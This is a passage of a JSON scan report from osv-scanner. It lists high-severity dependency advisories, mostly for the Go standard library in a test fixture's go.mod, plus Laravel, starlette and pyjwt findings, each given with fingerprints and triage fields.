"high", "confidence": 0.88, "triageState": "open", "verdict": "", "isResolved": false, "reason": "Collapsed 1 duplicate scanner signal(s) for the same underlying issue.", "evidence": {"match": "", "aliases": ["BIT-golang-2026-33814", "CVE-2026-33814"], "package": "stdlib", "rule_id": "GO-2026-4918", "scanner": "osv-scanner", "correlation_key": "vuln|stdlib|CVE-2026-33814|token", "duplicate_count": 1, "duplicate_rule_ids": ["GO-2026-4918"], "duplicate_scanners": ["osv-scanner"], "duplicate_fingerprints": ["2c2cc514095d1c5d00206adb0b149b4bc300edc9f20dcd9ffdb6fbe7fd69bf5c", "5fca1fe24cce8213376dbf2d89dd0f478a34e42e0b012781b6ff4e5b0276177b"]}}, "locations": [{"physicalLocation": {"artifactLocation": {"uri": "tests/fixtures/tier2/go-safe/go.mod"}, "region": {"startLine": 1}}}]}, {"ruleId": "GO-2026-4870", "level": "error", "message": {"text": "stdlib: GO-2026-4870"}, "properties": {"repobilityId": 145105, "scanner": "osv-scanner", "fingerprint": "617b93d5c48a029ae5aca8bd501f2e3bea7dac8bc21d793a090ee20081b769d3", "category": "dependency", "severity": "high", "confidence": 0.88, "triageState": "open", "verdict": "", "isResolved": false, "reason": "Collapsed 1 duplicate scanner signal(s) for the same underlying issue.", "evidence": {"match": "", "aliases": ["BIT-golang-2026-32283", "CVE-2026-32283"], "package": "stdlib", "rule_id": "GO-2026-4870", "scanner": "osv-scanner", "correlation_key": "vuln|stdlib|CVE-2026-32283|token", "duplicate_count": 1, "duplicate_rule_ids": ["GO-2026-4870"], "duplicate_scanners": ["osv-scanner"], "duplicate_fingerprints": ["617b93d5c48a029ae5aca8bd501f2e3bea7dac8bc21d793a090ee20081b769d3", "7027f8accaf5e53a6da839a1759425624746e07e8f94f1eefb69087765fb5e2a"]}}, "locations": [{"physicalLocation": {"artifactLocation": {"uri": "tests/fixtures/tier2/go-safe/go.mod"}, "region": {"startLine": 1}}}]}, {"ruleId": "GO-2026-4869", "level": "error", "message": {"text": "stdlib: GO-2026-4869"}, "properties": {"repobilityId": 145104, "scanner": 
"osv-scanner", "fingerprint": "be08cdf9ec4ecd894e42dad7b5e0850688a77062b75cde9cea1314f8f97a87f7", "category": "dependency", "severity": "high", "confidence": 0.88, "triageState": "open", "verdict": "", "isResolved": false, "reason": "Collapsed 1 duplicate scanner signal(s) for the same underlying issue.", "evidence": {"match": "", "aliases": ["BIT-golang-2026-32288", "CVE-2026-32288"], "package": "stdlib", "rule_id": "GO-2026-4869", "scanner": "osv-scanner", "correlation_key": "vuln|stdlib|CVE-2026-32288|token", "duplicate_count": 1, "duplicate_rule_ids": ["GO-2026-4869"], "duplicate_scanners": ["osv-scanner"], "duplicate_fingerprints": ["45c85af3db516fcaaf7d792d757b019c2a051392b8a2841207fe69a866f0e4d6", "be08cdf9ec4ecd894e42dad7b5e0850688a77062b75cde9cea1314f8f97a87f7"]}}, "locations": [{"physicalLocation": {"artifactLocation": {"uri": "tests/fixtures/tier2/go-safe/go.mod"}, "region": {"startLine": 1}}}]}, {"ruleId": "GO-2026-4865", "level": "error", "message": {"text": "stdlib: GO-2026-4865"}, "properties": {"repobilityId": 145103, "scanner": "osv-scanner", "fingerprint": "c616aaa90028d07af00a261e58553e068e9c3a96011909e2ba81f360885acf7c", "category": "dependency", "severity": "high", "confidence": 0.88, "triageState": "open", "verdict": "", "isResolved": false, "reason": "Collapsed 1 duplicate scanner signal(s) for the same underlying issue.", "evidence": {"match": "", "aliases": ["BIT-golang-2026-32289", "CVE-2026-32289"], "package": "stdlib", "rule_id": "GO-2026-4865", "scanner": "osv-scanner", "correlation_key": "vuln|stdlib|CVE-2026-32289|token", "duplicate_count": 1, "duplicate_rule_ids": ["GO-2026-4865"], "duplicate_scanners": ["osv-scanner"], "duplicate_fingerprints": ["95cc90d5f2125cae6a840110ff15dd2845ee557f3de0a16cdf9f8a8817bd3c22", "c616aaa90028d07af00a261e58553e068e9c3a96011909e2ba81f360885acf7c"]}}, "locations": [{"physicalLocation": {"artifactLocation": {"uri": "tests/fixtures/tier2/go-safe/go.mod"}, "region": {"startLine": 1}}}]}, {"ruleId": 
"GO-2026-4864", "level": "error", "message": {"text": "stdlib: GO-2026-4864"}, "properties": {"repobilityId": 145102, "scanner": "osv-scanner", "fingerprint": "ba11cd164921276a245542095cd2598580d2e04270f9a8eaa1a25f095579f003", "category": "dependency", "severity": "high", "confidence": 0.88, "triageState": "open", "verdict": "", "isResolved": false, "reason": "Collapsed 1 duplicate scanner signal(s) for the same underlying issue.", "evidence": {"match": "", "aliases": ["BIT-golang-2026-32282", "CVE-2026-32282"], "package": "stdlib", "rule_id": "GO-2026-4864", "scanner": "osv-scanner", "correlation_key": "vuln|stdlib|CVE-2026-32282|token", "duplicate_count": 1, "duplicate_rule_ids": ["GO-2026-4864"], "duplicate_scanners": ["osv-scanner"], "duplicate_fingerprints": ["791ad2a5eba117ec756b56863a806f5c3fc0e4c74ea0b4c1a1fc428a4963127f", "ba11cd164921276a245542095cd2598580d2e04270f9a8eaa1a25f095579f003"]}}, "locations": [{"physicalLocation": {"artifactLocation": {"uri": "tests/fixtures/tier2/go-safe/go.mod"}, "region": {"startLine": 1}}}]}, {"ruleId": "GO-2026-4603", "level": "error", "message": {"text": "stdlib: GO-2026-4603"}, "properties": {"repobilityId": 145101, "scanner": "osv-scanner", "fingerprint": "a7a140ade0314be4ce3a80f0092df1bdd387274e3672a5a3ab34c094b1602b91", "category": "dependency", "severity": "high", "confidence": 0.88, "triageState": "open", "verdict": "", "isResolved": false, "reason": "Collapsed 1 duplicate scanner signal(s) for the same underlying issue.", "evidence": {"match": "", "aliases": ["BIT-golang-2026-27142", "CVE-2026-27142"], "package": "stdlib", "rule_id": "GO-2026-4603", "scanner": "osv-scanner", "correlation_key": "vuln|stdlib|CVE-2026-27142|token", "duplicate_count": 1, "duplicate_rule_ids": ["GO-2026-4603"], "duplicate_scanners": ["osv-scanner"], "duplicate_fingerprints": ["9520eb16c207694d90fca10047ec69e72044acddbd50239812137d6d52183fc1", "a7a140ade0314be4ce3a80f0092df1bdd387274e3672a5a3ab34c094b1602b91"]}}, "locations": 
[{"physicalLocation": {"artifactLocation": {"uri": "tests/fixtures/tier2/go-safe/go.mod"}, "region": {"startLine": 1}}}]}, {"ruleId": "GO-2026-4602", "level": "error", "message": {"text": "stdlib: GO-2026-4602"}, "properties": {"repobilityId": 145100, "scanner": "osv-scanner", "fingerprint": "929ebe3ca01d37ddcb4fd2e217cf565ced5bc7b541562583c7a9aacdca533f71", "category": "dependency", "severity": "high", "confidence": 0.88, "triageState": "open", "verdict": "", "isResolved": false, "reason": "Collapsed 1 duplicate scanner signal(s) for the same underlying issue.", "evidence": {"match": "", "aliases": ["BIT-golang-2026-27139", "CVE-2026-27139"], "package": "stdlib", "rule_id": "GO-2026-4602", "scanner": "osv-scanner", "correlation_key": "vuln|stdlib|CVE-2026-27139|token", "duplicate_count": 1, "duplicate_rule_ids": ["GO-2026-4602"], "duplicate_scanners": ["osv-scanner"], "duplicate_fingerprints": ["929ebe3ca01d37ddcb4fd2e217cf565ced5bc7b541562583c7a9aacdca533f71", "e0fec3a93b7bc2bbe17b64c71c8c19b6533f5d82b15d09ed13fa12e06b87d33d"]}}, "locations": [{"physicalLocation": {"artifactLocation": {"uri": "tests/fixtures/tier2/go-safe/go.mod"}, "region": {"startLine": 1}}}]}, {"ruleId": "GO-2026-4601", "level": "error", "message": {"text": "stdlib: GO-2026-4601"}, "properties": {"repobilityId": 145099, "scanner": "osv-scanner", "fingerprint": "ac5384d34aae13f81419703bd402d363945a87374cd8d2cda23f21994870dfab", "category": "dependency", "severity": "high", "confidence": 0.88, "triageState": "open", "verdict": "", "isResolved": false, "reason": "Collapsed 1 duplicate scanner signal(s) for the same underlying issue.", "evidence": {"match": "", "aliases": ["BIT-golang-2026-25679", "CVE-2026-25679"], "package": "stdlib", "rule_id": "GO-2026-4601", "scanner": "osv-scanner", "correlation_key": "vuln|stdlib|CVE-2026-25679|token", "duplicate_count": 1, "duplicate_rule_ids": ["GO-2026-4601"], "duplicate_scanners": ["osv-scanner"], "duplicate_fingerprints": 
["ac5384d34aae13f81419703bd402d363945a87374cd8d2cda23f21994870dfab", "e1b28680733b0f28d9b4c1be4ed3de1b07ae22249920c361a4f3975c4f7253c3"]}}, "locations": [{"physicalLocation": {"artifactLocation": {"uri": "tests/fixtures/tier2/go-safe/go.mod"}, "region": {"startLine": 1}}}]}, {"ruleId": "GO-2026-4342", "level": "error", "message": {"text": "stdlib: GO-2026-4342"}, "properties": {"repobilityId": 145098, "scanner": "osv-scanner", "fingerprint": "4bff11983ab4b1bdb4ce57ed7e27cd72244471d5b8161a2a7881dcfd84a74fef", "category": "dependency", "severity": "high", "confidence": 0.88, "triageState": "open", "verdict": "", "isResolved": false, "reason": "Collapsed 1 duplicate scanner signal(s) for the same underlying issue.", "evidence": {"match": "", "aliases": ["BIT-golang-2025-61728", "CVE-2025-61728"], "package": "stdlib", "rule_id": "GO-2026-4342", "scanner": "osv-scanner", "correlation_key": "vuln|stdlib|CVE-2025-61728|token", "duplicate_count": 1, "duplicate_rule_ids": ["GO-2026-4342"], "duplicate_scanners": ["osv-scanner"], "duplicate_fingerprints": ["4bff11983ab4b1bdb4ce57ed7e27cd72244471d5b8161a2a7881dcfd84a74fef", "d95af2920097317919f996d41c89245b3fe1f67709d1a663e7c56c89ec7d8ec4"]}}, "locations": [{"physicalLocation": {"artifactLocation": {"uri": "tests/fixtures/tier2/go-safe/go.mod"}, "region": {"startLine": 1}}}]}, {"ruleId": "GO-2026-4341", "level": "error", "message": {"text": "stdlib: GO-2026-4341"}, "properties": {"repobilityId": 145097, "scanner": "osv-scanner", "fingerprint": "761428e98e5931ec485d64948432ffe377a1f704ce06be4823371361a8d2229d", "category": "dependency", "severity": "high", "confidence": 0.88, "triageState": "open", "verdict": "", "isResolved": false, "reason": "Collapsed 1 duplicate scanner signal(s) for the same underlying issue.", "evidence": {"match": "", "aliases": ["BIT-golang-2025-61726", "CVE-2025-61726"], "package": "stdlib", "rule_id": "GO-2026-4341", "scanner": "osv-scanner", "correlation_key": "vuln|stdlib|CVE-2025-61726|token", 
"duplicate_count": 1, "duplicate_rule_ids": ["GO-2026-4341"], "duplicate_scanners": ["osv-scanner"], "duplicate_fingerprints": ["585c4ab21b9b5633ba56173cbf45ab77714590b5ab38177a3c7744009beed862", "761428e98e5931ec485d64948432ffe377a1f704ce06be4823371361a8d2229d"]}}, "locations": [{"physicalLocation": {"artifactLocation": {"uri": "tests/fixtures/tier2/go-safe/go.mod"}, "region": {"startLine": 1}}}]}, {"ruleId": "GO-2026-4340", "level": "error", "message": {"text": "stdlib: GO-2026-4340"}, "properties": {"repobilityId": 145096, "scanner": "osv-scanner", "fingerprint": "cb14c619f4d650cdaca5c53ccfcf4d0de13ff9534facb83acdad32462b18a2fb", "category": "dependency", "severity": "high", "confidence": 0.88, "triageState": "open", "verdict": "", "isResolved": false, "reason": "Collapsed 1 duplicate scanner signal(s) for the same underlying issue.", "evidence": {"match": "", "aliases": ["BIT-golang-2025-61730", "CVE-2025-61730"], "package": "stdlib", "rule_id": "GO-2026-4340", "scanner": "osv-scanner", "correlation_key": "vuln|stdlib|CVE-2025-61730|token", "duplicate_count": 1, "duplicate_rule_ids": ["GO-2026-4340"], "duplicate_scanners": ["osv-scanner"], "duplicate_fingerprints": ["9a967fea1379b4b84ba86476d48d7a604fac04c1e24a33aa1b4b3e0ffff48d45", "cb14c619f4d650cdaca5c53ccfcf4d0de13ff9534facb83acdad32462b18a2fb"]}}, "locations": [{"physicalLocation": {"artifactLocation": {"uri": "tests/fixtures/tier2/go-safe/go.mod"}, "region": {"startLine": 1}}}]}, {"ruleId": "GO-2026-4337", "level": "error", "message": {"text": "stdlib: GO-2026-4337"}, "properties": {"repobilityId": 145095, "scanner": "osv-scanner", "fingerprint": "84e994c2804352db6f9af8d61a75766c161f1673a69f48e492cf20a23449c253", "category": "dependency", "severity": "high", "confidence": 0.88, "triageState": "open", "verdict": "", "isResolved": false, "reason": "Collapsed 1 duplicate scanner signal(s) for the same underlying issue.", "evidence": {"match": "", "aliases": ["BIT-golang-2025-68121", "CVE-2025-68121"], 
"package": "stdlib", "rule_id": "GO-2026-4337", "scanner": "osv-scanner", "correlation_key": "vuln|stdlib|CVE-2025-68121|token", "duplicate_count": 1, "duplicate_rule_ids": ["GO-2026-4337"], "duplicate_scanners": ["osv-scanner"], "duplicate_fingerprints": ["84e994c2804352db6f9af8d61a75766c161f1673a69f48e492cf20a23449c253", "ecbc5afa220304f948098106f13edd054a24b82fd38acb385d5c9a2a8e51bdd6"]}}, "locations": [{"physicalLocation": {"artifactLocation": {"uri": "tests/fixtures/tier2/go-safe/go.mod"}, "region": {"startLine": 1}}}]}, {"ruleId": "GO-2025-4175", "level": "error", "message": {"text": "stdlib: GO-2025-4175"}, "properties": {"repobilityId": 145094, "scanner": "osv-scanner", "fingerprint": "9cd77a1f7562c5349789f415af9f5ac7c3b303a3f2d1a7dcefb4cb3b5a45f59c", "category": "dependency", "severity": "high", "confidence": 0.88, "triageState": "open", "verdict": "", "isResolved": false, "reason": "Collapsed 1 duplicate scanner signal(s) for the same underlying issue.", "evidence": {"match": "", "aliases": ["BIT-golang-2025-61727", "CVE-2025-61727"], "package": "stdlib", "rule_id": "GO-2025-4175", "scanner": "osv-scanner", "correlation_key": "vuln|stdlib|CVE-2025-61727|token", "duplicate_count": 1, "duplicate_rule_ids": ["GO-2025-4175"], "duplicate_scanners": ["osv-scanner"], "duplicate_fingerprints": ["54234509c95cfb62faac1f2c01702fc89bedfdaebf98f887177074bb235c3428", "9cd77a1f7562c5349789f415af9f5ac7c3b303a3f2d1a7dcefb4cb3b5a45f59c"]}}, "locations": [{"physicalLocation": {"artifactLocation": {"uri": "tests/fixtures/tier2/go-safe/go.mod"}, "region": {"startLine": 1}}}]}, {"ruleId": "GO-2025-4155", "level": "error", "message": {"text": "stdlib: GO-2025-4155"}, "properties": {"repobilityId": 145093, "scanner": "osv-scanner", "fingerprint": "b0747eb6905a25ab553b04398d477668bfca7afab605ac7515911c4744febd8d", "category": "dependency", "severity": "high", "confidence": 0.88, "triageState": "open", "verdict": "", "isResolved": false, "reason": "Collapsed 1 duplicate scanner 
signal(s) for the same underlying issue.", "evidence": {"match": "", "aliases": ["BIT-golang-2025-61729", "CVE-2025-61729"], "package": "stdlib", "rule_id": "GO-2025-4155", "scanner": "osv-scanner", "correlation_key": "vuln|stdlib|CVE-2025-61729|token", "duplicate_count": 1, "duplicate_rule_ids": ["GO-2025-4155"], "duplicate_scanners": ["osv-scanner"], "duplicate_fingerprints": ["91c1f32d895639e6982306351d0b18022b5930cae0c367647d90cf8ac49250b1", "b0747eb6905a25ab553b04398d477668bfca7afab605ac7515911c4744febd8d"]}}, "locations": [{"physicalLocation": {"artifactLocation": {"uri": "tests/fixtures/tier2/go-safe/go.mod"}, "region": {"startLine": 1}}}]}, {"ruleId": "GO-2025-4015", "level": "error", "message": {"text": "stdlib: GO-2025-4015"}, "properties": {"repobilityId": 145092, "scanner": "osv-scanner", "fingerprint": "f97eb9832ed41295fbcc4d9eccebc87b4088f62146f907d37c11896c665c250a", "category": "dependency", "severity": "high", "confidence": 0.88, "triageState": "open", "verdict": "", "isResolved": false, "reason": "Collapsed 1 duplicate scanner signal(s) for the same underlying issue.", "evidence": {"match": "", "aliases": ["BIT-golang-2025-61724", "CVE-2025-61724"], "package": "stdlib", "rule_id": "GO-2025-4015", "scanner": "osv-scanner", "correlation_key": "vuln|stdlib|CVE-2025-61724|token", "duplicate_count": 1, "duplicate_rule_ids": ["GO-2025-4015"], "duplicate_scanners": ["osv-scanner"], "duplicate_fingerprints": ["5078dfb17df5cbfc66a3c33890bd3c2b07b4704dcd27cf2a71dd579a4bc2af74", "f97eb9832ed41295fbcc4d9eccebc87b4088f62146f907d37c11896c665c250a"]}}, "locations": [{"physicalLocation": {"artifactLocation": {"uri": "tests/fixtures/tier2/go-safe/go.mod"}, "region": {"startLine": 1}}}]}, {"ruleId": "GO-2025-4014", "level": "error", "message": {"text": "stdlib: GO-2025-4014"}, "properties": {"repobilityId": 145091, "scanner": "osv-scanner", "fingerprint": "95bbd234df2dd7f54ccc8e32dc8e2330efc78f0ae4525a45261a7de55feba8cd", "category": "dependency", "severity": 
"high", "confidence": 0.88, "triageState": "open", "verdict": "", "isResolved": false, "reason": "Collapsed 1 duplicate scanner signal(s) for the same underlying issue.", "evidence": {"match": "", "aliases": ["BIT-golang-2025-58183", "CVE-2025-58183"], "package": "stdlib", "rule_id": "GO-2025-4014", "scanner": "osv-scanner", "correlation_key": "vuln|stdlib|CVE-2025-58183|token", "duplicate_count": 1, "duplicate_rule_ids": ["GO-2025-4014"], "duplicate_scanners": ["osv-scanner"], "duplicate_fingerprints": ["95bbd234df2dd7f54ccc8e32dc8e2330efc78f0ae4525a45261a7de55feba8cd", "f1c4f3b8cc26231c55246d14ed4ebd8b5634faa6aa9a2d93e4365d72acd1888d"]}}, "locations": [{"physicalLocation": {"artifactLocation": {"uri": "tests/fixtures/tier2/go-safe/go.mod"}, "region": {"startLine": 1}}}]}, {"ruleId": "GO-2025-4013", "level": "error", "message": {"text": "stdlib: GO-2025-4013"}, "properties": {"repobilityId": 145090, "scanner": "osv-scanner", "fingerprint": "eec11caafa7439fcf76da7d19b1d4ddc6cb779338f8801bca3204d79fedb8f3f", "category": "dependency", "severity": "high", "confidence": 0.88, "triageState": "open", "verdict": "", "isResolved": false, "reason": "Collapsed 1 duplicate scanner signal(s) for the same underlying issue.", "evidence": {"match": "", "aliases": ["BIT-golang-2025-58188", "CVE-2025-58188"], "package": "stdlib", "rule_id": "GO-2025-4013", "scanner": "osv-scanner", "correlation_key": "vuln|stdlib|CVE-2025-58188|token", "duplicate_count": 1, "duplicate_rule_ids": ["GO-2025-4013"], "duplicate_scanners": ["osv-scanner"], "duplicate_fingerprints": ["41dde09e038941ea1f2559c3518ad414b561b3007fe88c7d5974099f7172792d", "eec11caafa7439fcf76da7d19b1d4ddc6cb779338f8801bca3204d79fedb8f3f"]}}, "locations": [{"physicalLocation": {"artifactLocation": {"uri": "tests/fixtures/tier2/go-safe/go.mod"}, "region": {"startLine": 1}}}]}, {"ruleId": "GO-2025-4012", "level": "error", "message": {"text": "stdlib: GO-2025-4012"}, "properties": {"repobilityId": 145089, "scanner": 
"osv-scanner", "fingerprint": "573f4561515c1adad5841a09755428c9d8178fe6b2f5a52a26d2b4f1dc42912c", "category": "dependency", "severity": "high", "confidence": 0.88, "triageState": "open", "verdict": "", "isResolved": false, "reason": "Collapsed 1 duplicate scanner signal(s) for the same underlying issue.", "evidence": {"match": "", "aliases": ["BIT-golang-2025-58186", "CVE-2025-58186"], "package": "stdlib", "rule_id": "GO-2025-4012", "scanner": "osv-scanner", "correlation_key": "vuln|stdlib|CVE-2025-58186|token", "duplicate_count": 1, "duplicate_rule_ids": ["GO-2025-4012"], "duplicate_scanners": ["osv-scanner"], "duplicate_fingerprints": ["0323ef68f5a841993e76169716558fd903ed3d328ae0830ea6a1f9725f8a082f", "573f4561515c1adad5841a09755428c9d8178fe6b2f5a52a26d2b4f1dc42912c"]}}, "locations": [{"physicalLocation": {"artifactLocation": {"uri": "tests/fixtures/tier2/go-safe/go.mod"}, "region": {"startLine": 1}}}]}, {"ruleId": "GO-2025-4011", "level": "error", "message": {"text": "stdlib: GO-2025-4011"}, "properties": {"repobilityId": 145088, "scanner": "osv-scanner", "fingerprint": "2d81742d463c091e5ffd4a3180ed78177b222c23678ccbf7d19a9626e06a5e79", "category": "dependency", "severity": "high", "confidence": 0.88, "triageState": "open", "verdict": "", "isResolved": false, "reason": "Collapsed 1 duplicate scanner signal(s) for the same underlying issue.", "evidence": {"match": "", "aliases": ["BIT-golang-2025-58185", "CVE-2025-58185"], "package": "stdlib", "rule_id": "GO-2025-4011", "scanner": "osv-scanner", "correlation_key": "vuln|stdlib|CVE-2025-58185|token", "duplicate_count": 1, "duplicate_rule_ids": ["GO-2025-4011"], "duplicate_scanners": ["osv-scanner"], "duplicate_fingerprints": ["2d81742d463c091e5ffd4a3180ed78177b222c23678ccbf7d19a9626e06a5e79", "394851c931ba3693283618cb21b8e859953fb5654c5fa08c13359b1f663a6531"]}}, "locations": [{"physicalLocation": {"artifactLocation": {"uri": "tests/fixtures/tier2/go-safe/go.mod"}, "region": {"startLine": 1}}}]}, {"ruleId": 
"GO-2025-4010", "level": "error", "message": {"text": "stdlib: GO-2025-4010"}, "properties": {"repobilityId": 145087, "scanner": "osv-scanner", "fingerprint": "0c1362abe932fd8c93847bcabf0eccbf54e84f7c66bf369eeb3a19e68cc044c5", "category": "dependency", "severity": "high", "confidence": 0.88, "triageState": "open", "verdict": "", "isResolved": false, "reason": "Collapsed 1 duplicate scanner signal(s) for the same underlying issue.", "evidence": {"match": "", "aliases": ["BIT-golang-2025-47912", "CVE-2025-47912"], "package": "stdlib", "rule_id": "GO-2025-4010", "scanner": "osv-scanner", "correlation_key": "vuln|stdlib|CVE-2025-47912|token", "duplicate_count": 1, "duplicate_rule_ids": ["GO-2025-4010"], "duplicate_scanners": ["osv-scanner"], "duplicate_fingerprints": ["0c1362abe932fd8c93847bcabf0eccbf54e84f7c66bf369eeb3a19e68cc044c5", "d83f9eac6d038175e7ddd898b419ae33e45b7b79a9806ccb2d108536f097de09"]}}, "locations": [{"physicalLocation": {"artifactLocation": {"uri": "tests/fixtures/tier2/go-safe/go.mod"}, "region": {"startLine": 1}}}]}, {"ruleId": "GO-2025-4009", "level": "error", "message": {"text": "stdlib: GO-2025-4009"}, "properties": {"repobilityId": 145086, "scanner": "osv-scanner", "fingerprint": "6fc4a7d4422e1e764a42c0ea91326c01254c9a7949ec46cd12af1c8906bfdfd2", "category": "dependency", "severity": "high", "confidence": 0.88, "triageState": "open", "verdict": "", "isResolved": false, "reason": "Collapsed 1 duplicate scanner signal(s) for the same underlying issue.", "evidence": {"match": "", "aliases": ["BIT-golang-2025-61723", "CVE-2025-61723"], "package": "stdlib", "rule_id": "GO-2025-4009", "scanner": "osv-scanner", "correlation_key": "vuln|stdlib|CVE-2025-61723|token", "duplicate_count": 1, "duplicate_rule_ids": ["GO-2025-4009"], "duplicate_scanners": ["osv-scanner"], "duplicate_fingerprints": ["6fc4a7d4422e1e764a42c0ea91326c01254c9a7949ec46cd12af1c8906bfdfd2", "7dfc418d42aad0c1ffdb835193f2b7610b504faa5ff0a0d243207d4ca6b2ce56"]}}, "locations": 
[{"physicalLocation": {"artifactLocation": {"uri": "tests/fixtures/tier2/go-safe/go.mod"}, "region": {"startLine": 1}}}]}, {"ruleId": "GO-2025-4008", "level": "error", "message": {"text": "stdlib: GO-2025-4008"}, "properties": {"repobilityId": 145085, "scanner": "osv-scanner", "fingerprint": "ec8b8f66a5c5ff6ab2e64ddafaa8efc3f342ddfa7337ceb26316a80e76b572bd", "category": "dependency", "severity": "high", "confidence": 0.88, "triageState": "open", "verdict": "", "isResolved": false, "reason": "Collapsed 1 duplicate scanner signal(s) for the same underlying issue.", "evidence": {"match": "", "aliases": ["BIT-golang-2025-58189", "CVE-2025-58189"], "package": "stdlib", "rule_id": "GO-2025-4008", "scanner": "osv-scanner", "correlation_key": "vuln|stdlib|CVE-2025-58189|token", "duplicate_count": 1, "duplicate_rule_ids": ["GO-2025-4008"], "duplicate_scanners": ["osv-scanner"], "duplicate_fingerprints": ["509eee6b0cee6248ce7acf3291b0df6b9850e9051e8c7c540f49ff56d4d719ca", "ec8b8f66a5c5ff6ab2e64ddafaa8efc3f342ddfa7337ceb26316a80e76b572bd"]}}, "locations": [{"physicalLocation": {"artifactLocation": {"uri": "tests/fixtures/tier2/go-safe/go.mod"}, "region": {"startLine": 1}}}]}, {"ruleId": "GO-2025-4007", "level": "error", "message": {"text": "stdlib: GO-2025-4007"}, "properties": {"repobilityId": 145084, "scanner": "osv-scanner", "fingerprint": "9ec125bff2d308da46522b768a33a3d6661467c37e8230fbaa757051b8401634", "category": "dependency", "severity": "high", "confidence": 0.88, "triageState": "open", "verdict": "", "isResolved": false, "reason": "Collapsed 1 duplicate scanner signal(s) for the same underlying issue.", "evidence": {"match": "", "aliases": ["BIT-golang-2025-58187", "CVE-2025-58187"], "package": "stdlib", "rule_id": "GO-2025-4007", "scanner": "osv-scanner", "correlation_key": "vuln|stdlib|CVE-2025-58187|token", "duplicate_count": 1, "duplicate_rule_ids": ["GO-2025-4007"], "duplicate_scanners": ["osv-scanner"], "duplicate_fingerprints": 
["1f121dcc377df8387a02f67f80344fdc68ca1931c040921ee696190511f071a2", "9ec125bff2d308da46522b768a33a3d6661467c37e8230fbaa757051b8401634"]}}, "locations": [{"physicalLocation": {"artifactLocation": {"uri": "tests/fixtures/tier2/go-safe/go.mod"}, "region": {"startLine": 1}}}]}, {"ruleId": "GO-2025-4006", "level": "error", "message": {"text": "stdlib: GO-2025-4006"}, "properties": {"repobilityId": 145083, "scanner": "osv-scanner", "fingerprint": "a770dd456e5ca4a7e669ce8b5b94473ff9f160de152f3c63cb1383e46bbedd13", "category": "dependency", "severity": "high", "confidence": 0.88, "triageState": "open", "verdict": "", "isResolved": false, "reason": "Collapsed 1 duplicate scanner signal(s) for the same underlying issue.", "evidence": {"match": "", "aliases": ["BIT-golang-2025-61725", "CVE-2025-61725"], "package": "stdlib", "rule_id": "GO-2025-4006", "scanner": "osv-scanner", "correlation_key": "vuln|stdlib|CVE-2025-61725|token", "duplicate_count": 1, "duplicate_rule_ids": ["GO-2025-4006"], "duplicate_scanners": ["osv-scanner"], "duplicate_fingerprints": ["a770dd456e5ca4a7e669ce8b5b94473ff9f160de152f3c63cb1383e46bbedd13", "f2dd2991845d8cf5116d38d1c2e958c43fe14fba3f98da2875b0d424f079620f"]}}, "locations": [{"physicalLocation": {"artifactLocation": {"uri": "tests/fixtures/tier2/go-safe/go.mod"}, "region": {"startLine": 1}}}]}, {"ruleId": "GHSA-gv7v-rgg6-548h", "level": "error", "message": {"text": "laravel/framework: GHSA-gv7v-rgg6-548h"}, "properties": {"repobilityId": 145082, "scanner": "osv-scanner", "fingerprint": "cab2a5eef5ae312ba5e7733c68bb81ab723b9fe7fff83812603a55831adc8f9b", "category": "dependency", "severity": "high", "confidence": 0.88, "triageState": "open", "verdict": "", "isResolved": false, "reason": "", "evidence": {"match": "", "aliases": ["BIT-laravel-2024-52301", "CVE-2024-52301"], "package": "laravel/framework", "rule_id": "GHSA-gv7v-rgg6-548h", "scanner": "osv-scanner", "correlation_key": "vuln|laravel/framework|CVE-2024-52301|token"}}, "locations": 
[{"physicalLocation": {"artifactLocation": {"uri": "tests/fixtures/tier2/composer-vulnerable/composer.lock"}, "region": {"startLine": 1}}}]}, {"ruleId": "PYSEC-2026-161", "level": "error", "message": {"text": "starlette: PYSEC-2026-161"}, "properties": {"repobilityId": 145078, "scanner": "osv-scanner", "fingerprint": "6c3fcf86b8f63f4c3ca9d5ef113bb3a8e6ef998d023094d24d07331a1f1634c2", "category": "dependency", "severity": "high", "confidence": 0.88, "triageState": "open", "verdict": "", "isResolved": false, "reason": "Collapsed 1 duplicate scanner signal(s) for the same underlying issue.", "evidence": {"match": "", "aliases": ["CVE-2026-48710", "GHSA-86qp-5c8j-p5mr", "X41-2026-002"], "package": "starlette", "rule_id": "PYSEC-2026-161", "scanner": "osv-scanner", "correlation_key": "vuln|starlette|CVE-2026-48710|requirements.txt", "duplicate_count": 1, "duplicate_rule_ids": ["GHSA-86qp-5c8j-p5mr", "PYSEC-2026-161"], "duplicate_scanners": ["osv-scanner"], "duplicate_fingerprints": ["544f51cbd2f65cfda3acbe070980bbe551ddfd354c9e4410e9af80f90268fa0a", "6c3fcf86b8f63f4c3ca9d5ef113bb3a8e6ef998d023094d24d07331a1f1634c2"]}}, "locations": [{"physicalLocation": {"artifactLocation": {"uri": "requirements.txt"}, "region": {"startLine": 1}}}]}, {"ruleId": "PYSEC-2026-179", "level": "error", "message": {"text": "pyjwt: PYSEC-2026-179"}, "properties": {"repobilityId": 145077, "scanner": "osv-scanner", "fingerprint": "5c3eafc67979022f561e9d4f5419a08a2752d1c1403b6231e0286243dc4de621", "category": "dependency", "severity": "high", "confidence": 0.88, "triageState": "open", "verdict": "", "isResolved": false, "reason": "", "evidence": {"match": "", "aliases": ["CVE-2026-48526", "GHSA-xgmm-8j9v-c9wx"], "package": "pyjwt", "rule_id": "PYSEC-2026-179", "scanner": "osv-scanner", "correlation_key": "vuln|pyjwt|CVE-2026-48526|requirements.txt"}}, "locations": [{"physicalLocation": {"artifactLocation": {"uri": "requirements.txt"}, "region": {"startLine": 1}}}]}, {"ruleId": "PYSEC-2026-178", 
"level": "error", "message": {"text": "pyjwt: PYSEC-2026-178"}, "properties": {"repobilityId": 145076, "scanner": "osv-scanner", "fingerprint": "d78da9b30f77c7f52b6df8d66103d01f553e3bf4dd2178d5ea0b37402014cb9a", "category": "dependency", "severity": "high", "confidence": 0.88, "triageState": "open", "verdict": "", "isResolved": false, "reason": "", "evidence": {"match": "", "aliases": ["CVE-2026-48525", "GHSA-w7vc-732c-9m39"], "package": "pyjwt", "rule_id": "PYSEC-2026-178", "scanner": "osv-scanner", "correlation_key": "vuln|pyjwt|CVE-2026-48525|requirements.txt"}}, "locations": [{"physicalLocation": {"artifactLocation": {"uri": "requirements.txt"}, "region": {"startLine": 1}}}]}, {"ruleId": "PYSEC-2026-177", "level": "error", "message": {"text": "pyjwt: PYSEC-2026-177"}, "properties": {"repobilityId": 145075, "scanner": "osv-scanner", "fingerprint": "3efd69038a22cfd1254fc5996a1045b73353f48034b55443c679a98678e7502c", "category": "dependency", "severity": "high", "confidence": 0.88, "triageState": "open", "verdict": "", 